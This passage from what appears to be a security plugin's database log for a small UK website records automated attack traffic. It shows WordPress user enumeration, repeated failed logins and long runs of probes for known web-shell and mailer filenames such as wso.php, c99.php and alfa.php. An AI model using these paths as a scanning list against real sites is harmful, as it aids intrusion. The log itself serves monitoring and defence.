VgdZe1oTxOaQR','','19|0|0|0|ashbooks.co.uk/cgi-bin/mt/mt-atom.cgi'),('82.165.222.205',1386602189,'',0,1636328882.6568,55,'mtlM6n0NKuBDQboY7pFeEPiH','','19|0|0|0|ashbooks.co.uk/mt/mt-atom.cgi'),('82.165.222.205',1386602189,'',0,1636328888.5722,55,'oCMtQ4Bk1rYiDAEN0g3OelmT','','19|0|0|0|ashbooks.co.uk/cgi-bin/mt-atom.cgi'),('82.165.222.205',1386602189,'',0,1636328894.8181,55,'7IrwGtYgbJulz8j6MeVapodx','','19|0|0|0|ashbooks.co.uk/cgi-bin/MT/mt-atom.cgi'),('82.165.222.205',1386602189,'',0,1636328900.8153,55,'nIwASVXH8UKxm3oOYbWDuT6k','','19|0|0|0|ashbooks.co.uk/MT/mt-atom.cgi'),('82.165.222.205',1386602189,'',0,1636328900.8510,10,'nIwASVXH8UKxm3oOYbWDuT6k','','707|0|0|0|ashbooks.co.uk/MT/mt-atom.cgi'),('82.165.222.205',1386602189,'',0,1636328906.4398,55,'4sTi2VG51XScMa38FfZb9kWC','','19|0|0|0|ashbooks.co.uk/mt-atom.cgi'),('45.158.15.145',765333393,'',0,1636338017.9406,55,'T149gubkPzp6ehc5l0HEO8Ld','','19|0|0|0|ashbooks.co.uk/wp-admin/css/colors/blue/blue/index.php'),('20.65.209.30',339857694,'',0,1636340780.9935,55,'tQbgaUlYcGVrmI7jZ05WueCD','','19|0|0|0|ashbooks.co.uk/a.php'),('212.192.246.199',3569415879,'',0,1636343743.7111,70,'85ZBMDIbA29LiXKJFhVTGsCg','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('136.144.41.14',2291149070,'',0,1636345572.4880,70,'W65oTlpEkG3cgFS0bBePLn19','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('69.30.217.110',1159649646,'admin',0,1636351819.6224,7,'BAldNEL8gmtMhU20Y5XefTzv','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636354410.5664,51,'b2sTc3EYxeiSt5d1NhPV6Ozk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636365208.9637,51,'QY3CVxWOLHFjJuw86mKBckPf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('137.184.117.45',2310567213,'',0,1636370756.5257,70,'VF4suLeJZpd9lRHzkfinoQcB','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('5.188.62.76',96222796,'ashbooks',0,1636375973.1173,51,'D1dcBACm8rO7M5ihegYU2uvX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.227.53.63',1088632127,'',0,1636385432.5351,70,'4gFhRL5ConWS1ke8Bz6V0bJE','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('64.227.53.63',1088632127,'',0,1636385432.8732,70,'YujBv0eLhVzwNMmUCcPsl8W3','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('5.188.62.76',96222796,'ashbooks',0,1636386561.2872,51,'ltQFSwuH6PV14e7f9LNjMWyv','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.135.70',2813101894,'',0,1636390703.1221,70,'it0oSO6Qavjb2s3Y5HDqdgxL','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('20.108.254.25',342687257,'',0,1636391759.5801,70,'lyq3grQ2nmxVRCBcUIp4J91z','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('192.187.118.203',3233511115,'ashbooks',0,1636393275.7751,51,'zi5YTntfa2rDUI1x6vXM4PKS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.168.174.187',1755885243,'',0,1636395168.9365,70,'9shjrI8TSmB1FCt2lAuovPfE','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('104.168.174.187',1755885243,'',0,1636395173.3052,70,'wcSZ3k8impD2JyleIzvC6hrb','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('5.188.62.76',96222796,'ashbooks',0,1636397220.1410,51,'C8k3bB4I0ayUSscAtJ9VFxEW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'wordcamp',0,1636407965.7632,51,'mwOLByKP7pGV0RUxMIN5Zht3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('174.138.28.238',2928286958,'',0,1636408121.9797,55,'2igICMJcj5Aeu7rG8HEzq1T3','','19|0|0|0|ashbooks.co.uk//new/wp-admin/install.php'),('174.138.28.238',2928286958,'',0,1636408124.9235,55,'zHxIsiRqE0VtlCYdb2MDQUny','','19|0|0|0|ashbooks.co.uk//wp/wp-admin/install.php'),('174.138.28.238',2928286958,'',0,1636408126.4014,55,'p4kIDxgNw8lZdPKcX3jRTaS2','','19|0|0|0|ashbooks.co.uk//wordpress/wp-admin/install.php'),('174.138.28.238',2928286958,'',0,1636408133.6367,55,'zrM4K1OAesvlbIWYh27uERfZ','','19|0|0|0|ashbooks.co.uk//new/wp-admin/setup-config.php'),('174.138.28.238',2928286958,'',0,1636408135.1590,55,'TxKfINPB9dVFqc3btho6Y17W','','19|0|0|0|ashbooks.co.uk//wp/wp-admin/setup-config.php'),('174.138.28.238',2928286958,'',0,1636408135.1770,10,'TxKfINPB9dVFqc3btho6Y17W','','707|0|0|0|ashbooks.co.uk//wp/wp-admin/setup-config.php'),('174.138.28.238',2928286958,'',0,1636408136.6453,55,'F1KkDYqw6NcM9WdnpVJl0s8x','','19|0|0|0|ashbooks.co.uk//wordpress/wp-admin/setup-config.php'),('35.175.188.167',598719655,'',0,1636408351.9519,55,'xRz3sclAdgJoSvZCEVtQHe8b','','19|0|0|0|ashbooks.co.uk/shell4.php'),('35.175.188.167',598719655,'',0,1636408352.4936,55,'Vqyf27uPAHQwsW5eKgjSh9dG','','19|0|0|0|ashbooks.co.uk/ups.php'),('35.175.188.167',598719655,'',0,1636408352.8073,55,'GLYu08gXbHIp6wqxctvos3SP','','19|0|0|0|ashbooks.co.uk/ru.php'),('35.175.188.167',598719655,'',0,1636408353.0317,55,'euJECPVatxZ9vhlYIbOq21pK','','19|0|0|0|ashbooks.co.uk/if.php'),('35.175.188.167',598719655,'',0,1636408353.4394,55,'8xReAhOuSNB7ztDkwcUjIXvo','','19|0|0|0|ashbooks.co.uk/vuln.php'),('35.175.188.167',598719655,'',0,1636408353.5012,10,'8xReAhOuSNB7ztDkwcUjIXvo','','707|0|0|0|ashbooks.co.uk/vuln.php'),('35.175.188.167',598719655,'',0,1636408353.7620,55,'quhAOHf0t4RiocVaJ3lFMzP8','','19|0|0|0|ashbooks.co.uk/fw.php'),('35.175.188.167',598719655,'',0,1636408354.0034,55,'QtLpNXdcBEeYgvAswOIZS9Pr','','19|0|0|0|ashbooks.co.uk/skipper.php'),('35.175.188.167',598719655,'',0,1636408354.5365,55,'wiaSkUqoR2uM9AFd56f3xTVJ','','19|0|0|0|ashbooks.co.uk/skippershell.php'),('35.175.188.167',598719655,'',0,1636408354.8455,55,'uxlfYH3BIT5Syv1RaCOdZsNg','','19|0|0|0|ashbooks.co.uk/tttt.php'),('35.175.188.167',598719655,'',0,1636408355.0839,55,'PALtvwI731OTVf6GokKUbYHc','','19|0|0|0|ashbooks.co.uk/tshop.php'),('35.175.188.167',598719655,'',0,1636408355.6076,55,'JVRqy2en4jEYBil8dg9fp6PH','','19|0|0|0|ashbooks.co.uk/alfa.php'),('35.175.188.167',598719655,'',0,1636408355.8608,55,'ZNxVBRMS46zDCvQXJ2fq9EhO','','19|0|0|0|ashbooks.co.uk/shell.php'),('35.175.188.167',598719655,'',0,1636408356.1068,55,'tqYcZUzwxmliMbnkg4Eo7ed8','','19|0|0|0|ashbooks.co.uk/inje3ctor.php'),('35.175.188.167',598719655,'',0,1636408356.6389,55,'ofIsPFYOj18ZRG9BahLXkgTr','','19|0|0|0|ashbooks.co.uk/saudi.php'),('35.175.188.167',598719655,'',0,1636408356.9090,55,'VO08MdwgvePYBIk9s2uDGJb7','','19|0|0|0|ashbooks.co.uk/wso.php'),('35.175.188.167',598719655,'',0,1636408357.3841,55,'TODPyxu9jHQJClW5ka3VbrvN','','19|0|0|0|ashbooks.co.uk/alfashell.php'),('35.175.188.167',598719655,'',0,1636408357.6036,55,'iwVmhpWREUsKdkrvYgHXL15y','','19|0|0|0|ashbooks.co.uk/my_alfa.php'),('35.175.188.167',598719655,'',0,1636408357.8441,55,'vAyol5nGBzRSkE6HDCO1wNh8','','19|0|0|0|ashbooks.co.uk/uploader.php'),('35.175.188.167',598719655,'',0,1636408358.0941,55,'B3q91ePa8lJ0sQmkFhypUtCV','','19|0|0|0|ashbooks.co.uk/up.php'),('35.175.188.167',598719655,'',0,1636408358.5781,55,'oRB8slO6f2ptYgeM40E9SJWz','','19|0|0|0|ashbooks.co.uk/hacked.php'),('35.175.188.167',598719655,'',0,1636408358.7938,55,'Lh614jNJERfAs7PT8VanBwGK','','19|0|0|0|ashbooks.co.uk/c99.php'),('35.175.188.167',598719655,'',0,1636408359.4155,55,'bfLd6RgiUztyEI8AJCwX1lF5','','19|0|0|0|ashbooks.co.uk/priv8.php'),('35.175.188.167',598719655,'',0,1636408359.6536,55,'vD1a8HjmuhcX2FqTonz946RP','','19|0|0|0|ashbooks.co.uk/Navir.php'),('35.175.188.167',598719655,'',0,1636408359.9310,55,'CTBHKyud9SV3bRNw8OJUlYFW','','19|0|0|0|ashbooks.co.uk/cmd13.php'),('35.175.188.167',598719655,'',0,1636408360.4182,55,'CPVwtXcWhrkMbLiFQTD724Y8','','19|0|0|0|ashbooks.co.uk/inc20k1.php'),('35.175.188.167',598719655,'',0,1636408360.6451,55,'WQaYTElHBwDmyXCd6qVIZ31k','','19|0|0|0|ashbooks.co.uk/1index.php'),('35.175.188.167',598719655,'',0,1636408360.8814,55,'AndXi2GLwvaOCMFsV7p0lPtU','','19|0|0|0|ashbooks.co.uk/404.php'),('35.175.188.167',598719655,'',0,1636408361.0981,55,'S3g6K1OeR7FixPZyIcG4lbuE','','19|0|0|0|ashbooks.co.uk/swm.php'),('35.175.188.167',598719655,'',0,1636408361.5722,55,'xTZsWUNPreJuDkXf2yv7LMpb','','19|0|0|0|ashbooks.co.uk/wp.php'),('35.175.188.167',598719655,'',0,1636408361.7866,55,'HKW8GjuU2l0xmMcTpINzri1b','','19|0|0|0|ashbooks.co.uk/doc.php'),('35.175.188.167',598719655,'',0,1636408362.0105,55,'WuQvaLYpt9IbS1lCB2OVoN8n','','19|0|0|0|ashbooks.co.uk/shx.php'),('35.175.188.167',598719655,'',0,1636408362.4979,55,'fSxndk8F0AptZ3VUMaJ4rQgT','','19|0|0|0|ashbooks.co.uk/ws.php'),('35.175.188.167',598719655,'',0,1636408362.7213,55,'0Yptm4K3aVUueG15jF9LWPZC','','19|0|0|0|ashbooks.co.uk/m.php'),('35.175.188.167',598719655,'',0,1636408362.9831,55,'FknuqR9XENdjcZz50bADOHtB','','19|0|0|0|ashbooks.co.uk/edit-form.php'),('35.175.188.167',598719655,'',0,1636408363.4762,55,'tHRwZjOsI6J0giV2C71zAa5k','','19|0|0|0|ashbooks.co.uk/LEAF.php'),('35.175.188.167',598719655,'',0,1636408363.6895,55,'SdgQO6icKRe4tx7VmZvqDy2P','','19|0|0|0|ashbooks.co.uk/leafmailer.php'),('35.175.188.167',598719655,'',0,1636408363.9035,55,'tmlTd0eEWgKJNx51vUu26qcP','','19|0|0|0|ashbooks.co.uk/mailer.php'),('35.175.188.167',598719655,'',0,1636408364.4410,55,'nuwbBXG7azqRfpHx2lcsI9oe','','19|0|0|0|ashbooks.co.uk/leafmailer2.8.php'),('35.175.188.167',598719655,'',0,1636408364.6872,55,'auWe5mg3bE7pHIUB9hYdXPTS','','19|0|0|0|ashbooks.co.uk/Leaf.php'),('35.175.188.167',598719655,'',0,1636408364.8933,55,'yLpdjYOJlCk8DIbZ43zwoRXh','','19|0|0|0|ashbooks.co.uk/leaf.php'),('35.175.188.167',598719655,'',0,1636408365.1136,55,'SOxCUpfbF9A38eyXEZaj4ul5','','19|0|0|0|ashbooks.co.uk/priv8.php'),('104.219.251.41',1759247145,'',0,1636410389.0142,55,'Ke9H50Bdnr2yCOmAisDSRJoG','','19|0|0|0|ashbooks.co.uk/info.php'),('104.219.251.41',1759247145,'',0,1636410391.6511,55,'2NYx4zEraefdKOmVt7nSDw3A','','19|0|0|0|ashbooks.co.uk/phpinfo.php'),('157.245.174.114',2650123890,'',0,1636414713.8338,55,'XQmwjBs39fapMgFSxVK6HrTI','','19|0|0|0|ashbooks.co.uk/x.php'),('157.245.174.114',2650123890,'',0,1636414714.5257,55,'IyJmwZc5vlh7Vu6Gq4BUQ1dr','','19|0|0|0|ashbooks.co.uk/alfa.php'),('157.245.174.114',2650123890,'',0,1636414714.9838,55,'ZdYNj3ytDIVpif15nBmRuUaP','','19|0|0|0|ashbooks.co.uk/c99.php'),('157.245.174.114',2650123890,'',0,1636414715.7313,55,'Xb2YsL1vzEjdnUDc0CxIomH7','','19|0|0|0|ashbooks.co.uk/mini.php'),('157.245.174.114',2650123890,'',0,1636414716.4347,55,'EhWSVGPNtb9Di4oFku2aMCYn','','19|0|0|0|ashbooks.co.uk/a.php'),('157.245.174.114',2650123890,'',0,1636414716.4531,10,'EhWSVGPNtb9Di4oFku2aMCYn','','707|0|0|0|ashbooks.co.uk/a.php'),('157.245.174.114',2650123890,'',0,1636414716.8893,55,'L5YOPa1XiUz30qfRmj2VeNcD','','19|0|0|0|ashbooks.co.uk/wso.php'),('157.245.174.114',2650123890,'',0,1636414717.5951,55,'ZH2znGlDkjtEiQKrecB05NVb','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/dzs-zoomsounds/wp_mnax.php'),('157.245.174.114',2650123890,'',0,1636414718.6120,55,'lkpxusa85Od7HJitCYNL13Kg','','19|0|0|0|ashbooks.co.uk/leafmailer.php'),('157.245.174.114',2650123890,'',0,1636414719.0653,55,'adAUoTPZ96kb2jiumwzFNg07','','19|0|0|0|ashbooks.co.uk/le.php'),('157.245.174.114',2650123890,'',0,1636414719.7411,55,'qItEvKNfpCiV3udzx7X2cTlo','','19|0|0|0|ashbooks.co.uk/1index.php'),('157.245.174.114',2650123890,'',0,1636414720.4051,55,'ITo1Yhlx4VasziDqtpCPk0yd','','19|0|0|0|ashbooks.co.uk/fw.php'),('20.65.209.30',339857694,'',0,1636415486.1285,70,'0YWiwDFoO16CeR8yEMgukTmL','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('20.65.209.30',339857694,'admin',0,1636415490.2387,7,'98aRsrQ3vTJ2G0YeSBXWKPF5','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('5.188.62.76',96222796,'adminlin',0,1636418713.0217,51,'ti7w3uPla8oGLybBjqFempHN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.240.27',1159655451,'admin',0,1636419443.0942,7,'qL7YWUpF69Ncnbi3wmvok1A0','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('141.94.206.147',2371800723,'',0,1636420821.8238,55,'tvd43Ih9FyqJbMKjUkRZ2Wa6','','19|0|0|0|ashbooks.co.uk/wso.php'),('141.94.206.147',2371800723,'',0,1636420829.8522,55,'ur2XUdR7VTv45K8qx6kJ1ZD3','','19|0|0|0|ashbooks.co.uk/x.php'),('141.94.206.147',2371800723,'',0,1636420837.3721,55,'BvYICRXhxue5M91gdQfU8Nls','','19|0|0|0|ashbooks.co.uk/wso.php'),('141.94.206.147',2371800723,'',0,1636420842.6151,55,'NUfxwb2zdcphEtDRJPuQmMSB','','19|0|0|0|ashbooks.co.uk/srx.php'),('141.94.206.147',2371800723,'',0,1636420860.9121,55,'n7xO1FLSZdtCBza0KXugMQ4G','','19|0|0|0|ashbooks.co.uk/1337.php'),('141.94.206.147',2371800723,'',0,1636420860.9461,10,'n7xO1FLSZdtCBza0KXugMQ4G','','707|0|0|0|ashbooks.co.uk/1337.php'),('141.94.206.147',2371800723,'',0,1636420870.7614,55,'VeK7tjGoNwF2QUqAXanP1ph5','','19|0|0|0|ashbooks.co.uk/utchiha.php'),('141.94.206.147',2371800723,'',0,1636420882.6687,55,'Q8wUKfiHNY6RsckClSq9OgWV','','19|0|0|0|ashbooks.co.uk/xx.php'),('141.94.206.147',2371800723,'',0,1636420896.3357,55,'oz93ZGT4EFgQOcRyu08IA6dP','','19|0|0|0|ashbooks.co.uk/ex.php'),('141.94.206.147',2371800723,'',0,1636420917.1631,55,'goQIcMRw7TO2dekP4KjbsJlC','','19|0|0|0|ashbooks.co.uk/f6cpw.php'),('141.94.206.147',2371800723,'',0,1636420923.5270,55,'30uwUlZPCGb85ntQdrKjzcqf','','19|0|0|0|ashbooks.co.uk/XxX.php'),('141.94.206.147',2371800723,'',0,1636420938.3548,55,'vHdiCuEFeV71Uc3DrfLISsta','','19|0|0|0|ashbooks.co.uk/leaf.php'),('141.94.206.147',2371800723,'',0,1636420954.8882,55,'FWPOukezZ2QghN86EnJlvBCU','','19|0|0|0|ashbooks.co.uk/darkshell.php'),('141.94.206.147',2371800723,'',0,1636420974.2931,55,'sPuvEToD4x6HmJl8rLYk0aNi','','19|0|0|0|ashbooks.co.uk/leafmailer2.8.php'),('141.94.206.147',2371800723,'',0,1636420982.7882,55,'84klfvMX01TZ3ubC6nOiyFzJ','','19|0|0|0|ashbooks.co.uk/alfav4.php'),('141.94.206.147',2371800723,'',0,1636420990.3944,55,'sT2H4RlEbYUBLz3u1kiOQPF5','','19|0|0|0|ashbooks.co.uk/bb.php'),('141.94.206.147',2371800723,'',0,1636421001.4942,55,'fsnmPhRIpTq9v7zl0Mbd6C1y','','19|0|0|0|ashbooks.co.uk/wp-cephek.php'),('141.94.206.147',2371800723,'',0,1636421009.1271,55,'hbAtrlUiW0Eu5I1k9aCvsxB2','','19|0|0|0|ashbooks.co.uk/fr.php'),('141.94.206.147',2371800723,'',0,1636421017.9962,100,'Az3k7QjIUqyKldWfGpXYhuiJ','','13|0|0|0|ashbooks.co.uk/admi.php'),('141.94.206.147',2371800723,'',0,1636421035.7103,55,'GZTIjnso2rEDc5A9PXtSYLMd','','19|0|0|0|ashbooks.co.uk/wx.php'),('141.94.206.147',2371800723,'',0,1636421042.1774,55,'HgVmrEYfIi0Xh8MUbkuqSRvc','','19|0|0|0|ashbooks.co.uk/classs-wp.php'),('141.94.206.147',2371800723,'',0,1636421050.7022,55,'aSwpWQNEz4HBlqox7KU0Ziju','','19|0|0|0|ashbooks.co.uk/task-check.php'),('141.94.206.147',2371800723,'',0,1636421059.9102,55,'w8G0Ds2y9NhHQA4IqtXE7kgz','','19|0|0|0|ashbooks.co.uk/temp.php'),('141.94.206.147',2371800723,'',0,1636421068.9804,55,'N0d51q3AX89w4KOQuTlojtnB','','19|0|0|0|ashbooks.co.uk/xss.php'),('141.94.206.147',2371800723,'',0,1636421097.7868,55,'gZA1Xhk6q8LoY7TrsNzxlQcF','','19|0|0|0|ashbooks.co.uk/ol.php'),('141.94.206.147',2371800723,'',0,1636421105.4527,55,'RmW3LHMYoJIlSKF7681NyfGA','','19|0|0|0|ashbooks.co.uk/werd.php'),('141.94.206.147',2371800723,'',0,1636421134.2589,55,'lWUXwEtgzAG3C9iJco01f4Du','','19|0|0|0|ashbooks.co.uk/mindex22.php'),('141.94.206.147',2371800723,'',0,1636421144.9982,55,'CxhXB8ybwQRlDUJE5T0IPmSf','','19|0|0|0|ashbooks.co.uk/mindex.php'),('141.94.206.147',2371800723,'',0,1636421154.1071,55,'UQPoaZcMs4FtIpm3ndTkX8u2','','19|0|0|0|ashbooks.co.uk/g.php'),('141.94.206.147',2371800723,'',0,1636421159.5408,55,'DMjVP27BJsoyTzdmHAONR1Lu','','19|0|0|0|ashbooks.co.uk/wp-admin/g.php'),('141.94.206.147',2371800723,'',0,1636421168.0193,55,'Q3yjih2sJtZeCIWuLHrEOSBF','','19|0|0|0|ashbooks.co.uk/wp-tomar.php'),('141.94.206.147',2371800723,'',0,1636421174.2580,55,'C4JE8LTsfzMkXFH5cw6UOuRA','','19|0|0|0|ashbooks.co.uk/load.php'),('141.94.206.147',2371800723,'',0,1636421183.7554,55,'Fsa4Jly9QzWctIBNYkMVwme8','','19|0|0|0|ashbooks.co.uk/wp-xssf.php'),('141.94.206.147',2371800723,'',0,1636421194.6943,55,'TgU0k3V1eKm2qwMiLsG8CfWb','','19|0|0|0|ashbooks.co.uk/m.php'),('141.94.206.147',2371800723,'',0,1636421210.8645,55,'M1GjVvmZ8i3XIPBkNH7Q2ULK','','19|0|0|0|ashbooks.co.uk/cloudxv3.php'),('141.94.206.147',2371800723,'',0,1636421217.4963,55,'ePXlZkrb103hTvqom8w7gafy','','19|0|0|0|ashbooks.co.uk/es.php'),('141.94.206.147',2371800723,'',0,1636421231.8357,55,'Fewf0ZxgLBcy7QoXdHMlUpjE','','19|0|0|0|ashbooks.co.uk/admi.php'),('141.94.206.147',2371800723,'',0,1636421243.7960,55,'ZG6fgD0AqmR1UOhxeNaTSd9t','','19|0|0|0|ashbooks.co.uk/Lux.php'),('141.94.206.147',2371800723,'',0,1636421253.3247,55,'7nlwUJQ2xoVgdIYFivbtz0pj','','19|0|0|0|ashbooks.co.uk/viii.php'),('141.94.206.147',2371800723,'',0,1636421263.8825,55,'dPzwpa92RTo4QgikevZynYK3','','19|0|0|0|ashbooks.co.uk/anderson.php'),('141.94.206.147',2371800723,'',0,1636421272.8612,55,'o0sxVQbKmD3EX1cv5HLflgpR','','19|0|0|0|ashbooks.co.uk/wp-configures.php'),('141.94.206.147',2371800723,'',0,1636421277.0416,55,'kPbtac0y2CsQNwBdlqWfOUA6','','19|0|0|0|ashbooks.co.uk/wp-admin/foqsn.php'),('141.94.206.147',2371800723,'',0,1636421289.9218,55,'YiGaj8r9tTNwm40kpeqdM6CP','','19|0|0|0|ashbooks.co.uk/wp-admin/readmee.php'),('141.94.206.147',2371800723,'',0,1636421299.2814,55,'DmpErgc6AfXezTHBCnobhs5i','','19|0|0|0|ashbooks.co.uk/readmee.php'),('141.94.206.147',2371800723,'',0,1636421306.8335,55,'ye6QZpOoC5PxA3k1FBNvl4tu','','19|0|0|0|ashbooks.co.uk/wp-admin/wp-admins.php'),('141.94.206.147',2371800723,'',0,1636421314.6838,55,'Ozm8vRVopbLKUHfAtDQ4ZrEc','','19|0|0|0|ashbooks.co.uk/px.php'),('141.94.206.147',2371800723,'',0,1636421320.4902,55,'VKldFrgspy7vobqPh1Ize0HC','','19|0|0|0|ashbooks.co.uk/wp-admins.php'),('141.94.206.147',2371800723,'',0,1636421332.2445,55,'ukiVljO3grXCQJWF7bfUcMsH','','19|0|0|0|ashbooks.co.uk/wp-tomar.php'),('141.94.206.147',2371800723,'',0,1636421338.0196,55,'rJTwgMBdxLFWqkY80tsEZi2A','','19|0|0|0|ashbooks.co.uk/ybh35.php'),('141.94.206.147',2371800723,'',0,1636421349.3413,55,'XilJISsVB1qdKFeH0NtToaQ9','','19|0|0|0|ashbooks.co.uk/up.php'),('141.94.206.147',2371800723,'',0,1636421355.1454,55,'vVzJoqBcRlPOstHwfp02U6mS','','19|0|0|0|ashbooks.co.uk/wp-content/up.php'),('141.94.206.147',2371800723,'',0,1636421362.5658,55,'IiVz3lCTGRDZ24UrOWBdjKYF','','19|0|0|0|ashbooks.co.uk/temp.php'),('141.94.206.147',2371800723,'',0,1636421376.7457,55,'RJuCENXzyxjTMc1DfVK826PG','','19|0|0|0|ashbooks.co.uk/wp-admin/icryk.php'),('141.94.206.147',2371800723,'',0,1636421384.1303,55,'Blu48rWEZHiIeFPXGq57Azpw','','19|0|0|0|ashbooks.co.uk/xss.php'),('141.94.206.147',2371800723,'',0,1636421401.6657,55,'FcdT5Z0CQ3bs4aHVMik6OhxP','','19|0|0|0|ashbooks.co.uk/wp-includes/fr.php'),('141.94.206.147',2371800723,'',0,1636421412.1776,55,'1KGh4VMJ93O6QwrkmxlyqZpU','','19|0|0|0|ashbooks.co.uk/wp-includes/wso.php'),('141.94.206.147',2371800723,'',0,1636421416.4907,55,'CwuhG2vPWzVn0Rkdxe1NfH7m','','19|0|0|0|ashbooks.co.uk/wp-includes/xss.php'),('141.94.206.147',2371800723,'',0,1636421423.1308,55,'YF8A4TroOjks7aEtUJlpVh9b','','19|0|0|0|ashbooks.co.uk/1b.php'),('141.94.206.147',2371800723,'',0,1636421442.7550,55,'o2AmV6LyJ1ge9OfskQtcahBX','','19|0|0|0|ashbooks.co.uk/mek.php'),('141.94.206.147',2371800723,'',0,1636421456.0603,55,'nFNhjOQpidPgwzrxIuc4ZCEy','','19|0|0|0|ashbooks.co.uk/wp-cronse.php'),('141.94.206.147',2371800723,'',0,1636421460.8033,100,'zSFio0Vf3P5abJjpARLZ4KU8','','13|0|0|0|ashbooks.co.uk/wp-cronse.php'),('141.94.206.147',2371800723,'',0,1636421466.6721,55,'PZhH3KW90ClmIBnbOeg2Jx1c','','19|0|0|0|ashbooks.co.uk/askimet.php'),('141.94.206.147',2371800723,'',0,1636421472.9525,55,'4N25ntRigaS8VITsDBp9Acq1','','19|0|0|0|ashbooks.co.uk/wp-includes/askimet.php'),('141.94.206.147',2371800723,'',0,1636421486.1730,55,'8nGMDBEza2sCPqNuFytf3Avk','','19|0|0|0|ashbooks.co.uk/ws.php'),('141.94.206.147',2371800723,'',0,1636421494.9315,100,'f51OhvZ39tsxCKVclAPoWLHn','','13|0|0|0|ashbooks.co.uk/ws.php'),('141.94.206.147',2371800723,'',0,1636421502.7756,55,'MtbealJXoSK38TFrsuV9iqZD','','19|0|0|0|ashbooks.co.uk/nav.php'),('141.94.206.147',2371800723,'',0,1636421522.7212,100,'KnCV4YxLhWwri7o68OJG2aqv','','13|0|0|0|ashbooks.co.uk/nav.php'),('141.94.206.147',2371800723,'',0,1636421543.9839,55,'QVmHYlZMqKo5wBT2yROzbvPc','','19|0|0|0|ashbooks.co.uk/wp-dashboard.php'),('141.94.206.147',2371800723,'',0,1636421551.4931,55,'ylFPstD6VJCdQbaxG4mXh3gY','','19|0|0|0|ashbooks.co.uk/init.php'),('141.94.206.147',2371800723,'',0,1636421561.4424,55,'GcCfEieYV674wvohbKHXR8sj','','19|0|0|0|ashbooks.co.uk/wp-options.php'),('141.94.206.147',2371800723,'',0,1636421571.7307,55,'MaCR6XcNe0Wsv8hpS4jOnZr1','','19|0|0|0|ashbooks.co.uk/wp-activer.php'),('141.94.206.147',2371800723,'',0,1636421580.8684,55,'Lua6Yl870UeQoqRVxkBjhJKC','','19|0|0|0|ashbooks.co.uk/task-check.php'),('141.94.206.147',2371800723,'',0,1636421592.5321,55,'KnkidcfSFyQ9M4epWO8Hahl1','','19|0|0|0|ashbooks.co.uk/haxor.php'),('141.94.206.147',2371800723,'',0,1636421602.1043,55,'fyP7G4VbWjp59JIDdnR3wA8X','','19|0|0|0|ashbooks.co.uk/405.php'),('141.94.206.147',2371800723,'',0,1636421609.5921,55,'P2sONgbIGBmVwcidf4uxynJe','','19|0|0|0|ashbooks.co.uk/shell.php'),('141.94.206.147',2371800723,'',0,1636421614.0731,55,'5CuQml48AdH21R6FKngtXSOf','','19|0|0|0|ashbooks.co.uk/leaf.php'),('141.94.206.147',2371800723,'',0,1636421618.2881,55,'TkXhqoG6HldLQeBy0SrR3N9U','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('141.94.206.147',2371800723,'',0,1636421630.2250,55,'onILruxhfibmDqCpgRQES2BH','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/wso.php'),('141.94.206.147',2371800723,'',0,1636421634.7056,55,'L8UDSYFIowe1sEjC6vNqgVzW','','19|0|0|0|ashbooks.co.uk/alex.php'),('141.94.206.147',2371800723,'',0,1636421643.3733,55,'0cwkMlaE8eH3nCYRSuivFD2d','','19|0|0|0|ashbooks.co.uk/mailer.php'),('141.94.206.147',2371800723,'',0,1636421657.6975,55,'dqoPtwT8J3WCfe1xYnkUmFXI','','19|0|0|0|ashbooks.co.uk/anone.php'),('141.94.206.147',2371800723,'',0,1636421670.9698,55,'pe0OJ6Q7M24SiloacCW3BsG5','','19|0|0|0|ashbooks.co.uk/a.php'),('141.94.206.147',2371800723,'',0,1636421675.6449,55,'94tkg8sDxzOYZj5fRv1qaVUQ','','19|0|0|0|ashbooks.co.uk/wp-configer.php'),('141.94.206.147',2371800723,'',0,1636421683.4425,55,'wNgjPAGYXel2VpEuiqcvWHJd','','19|0|0|0|ashbooks.co.uk/alfa.php'),('141.94.206.147',2371800723,'',0,1636421692.6543,55,'lFkiozE8XSNyOhnPaZBrATwV','','19|0|0|0|ashbooks.co.uk/wso.php'),('141.94.206.147',2371800723,'',0,1636421704.1806,55,'qSht68vcXYmIULlTZ2xf7GN5','','19|0|0|0|ashbooks.co.uk/c.php'),('141.94.206.147',2371800723,'',0,1636421715.8418,55,'fnb3GFEkJTy6cDHvljKUWZp2','','19|0|0|0|ashbooks.co.uk/1.php'),('141.94.206.147',2371800723,'',0,1636421730.6139,55,'KNeMG9XhjbA6F2415kLSVDr8','','19|0|0|0|ashbooks.co.uk/send.php'),('141.94.206.147',2371800723,'',0,1636421741.2726,55,'dBqr8nHzm6cWGvI1k4Vt9MNR','','19|0|0|0|ashbooks.co.uk/3.php'),('141.94.206.147',2371800723,'',0,1636421747.4864,55,'6cPWKVbdsFyM3XG1zStCrAfi','','19|0|0|0|ashbooks.co.uk/404.php'),('141.94.206.147',2371800723,'',0,1636421761.3515,55,'laY5NByeGofz7MhQ6cdjxD8S','','19|0|0|0|ashbooks.co.uk/sym.php'),('141.94.206.147',2371800723,'',0,1636421769.5183,55,'PuQx6Sw3IEsZML